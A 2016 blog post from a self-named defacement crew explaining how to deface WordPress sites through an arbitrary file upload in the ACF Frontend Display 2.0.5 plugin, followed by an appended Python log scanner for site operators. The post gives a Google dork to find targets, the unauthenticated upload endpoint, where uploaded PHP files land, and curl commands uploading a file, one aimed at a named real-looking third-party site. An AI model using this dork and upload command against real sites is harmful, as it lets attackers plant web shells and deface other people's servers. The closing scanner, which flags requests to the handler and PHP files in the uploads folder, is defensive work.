Wednesday, 30 November 2016

How to Deface with the ACF Frontend Display 2.0.5 Plugin - WordPress Arbitrary File Upload

# WordPress Plugin ACF Frontend Display 2.0.5 - Arbitrary File Upload
# 30 - 11 - 2016
N45HT - ShinChan

  • Google Dork : inurl:"/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/"
  • Exploit : target.com/[path]/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php
  • File Path : target.com/[path]/wp-content/uploads/uigen_[tahun_upload]/file.php ([tahun_upload] is the year the file was uploaded)

    vuln
    • PoC :
      • curl -k -X POST -F "action=upload" -F "files=/direktori file/" "target.com/[path]/exploit"
      • Example : curl -k -X POST -F "action=upload" -F "files=@/home/administrator/Desktop/po.jpg" "plataforma.proyectoitaca.co/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php"
    success!
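Added example for site operators, not part of the original post: a small Python scanner over constructed Apache-style access-log lines that flags POST requests to the plugin's blueimp upload handler path and any request for a .php file under wp-content/uploads/uigen_<year>/, the two paths named above. The IPs, timestamps and file names in the sample log are constructed.

```python
import re
from typing import Dict, List, Optional

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [30/Nov/2016:10:12:01 +0000] "POST /wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php HTTP/1.1" 200 512 "-" "curl/7.47.0"
203.0.113.7 - - [30/Nov/2016:10:12:09 +0000] "GET /wp-content/uploads/uigen_2016/po.php HTTP/1.1" 200 128 "-" "curl/7.47.0"
198.51.100.4 - - [30/Nov/2016:10:13:22 +0000] "GET /wp-content/uploads/2016/11/banner.jpg HTTP/1.1" 200 20483 "https://example.test/" "Mozilla/5.0"
198.51.100.4 - - [30/Nov/2016:10:14:05 +0000] "GET /wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php HTTP/1.1" 200 64 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Path of the bundled blueimp upload handler that the post abuses.
UPLOAD_HANDLER = "/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php"
# Uploads land in wp-content/uploads/uigen_<year>/; a PHP file there is a red flag.
UIGEN_SCRIPT = re.compile(r"/wp-content/uploads/uigen_\d{4}/[^/?]+\.ph(p\d?|tml)$", re.IGNORECASE)


def parse(line: str) -> Optional[Dict[str, str]]:
    """Return the parsed fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry: Dict[str, str]) -> List[str]:
    """Return finding tags for one parsed entry (empty list if nothing suspicious)."""
    path = entry["path"].split("?", 1)[0]  # ignore query string
    findings = []
    if path.endswith(UPLOAD_HANDLER):
        # POST = an actual upload attempt; anything else = reconnaissance of the handler
        findings.append("upload_handler_post" if entry["method"] == "POST" else "upload_handler_probe")
    if UIGEN_SCRIPT.search(path):
        findings.append("uigen_php_request")
    return findings


def scan(log_text: str) -> Dict[str, List[str]]:
    """Map each finding tag to the 'ip path' pairs that triggered it."""
    hits: Dict[str, List[str]] = {}
    for line in log_text.splitlines():
        entry = parse(line)
        if entry is None:
            continue
        for tag in classify(entry):
            hits.setdefault(tag, []).append(f"{entry['ip']} {entry['path']}")
    return hits


if __name__ == "__main__":
    for tag, events in scan(SAMPLE_LOG).items():
        print(tag, events)
```

Any hit on `uigen_php_request` should be followed by checking the uploads directory for PHP files and blocking script execution under wp-content/uploads at the web server.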
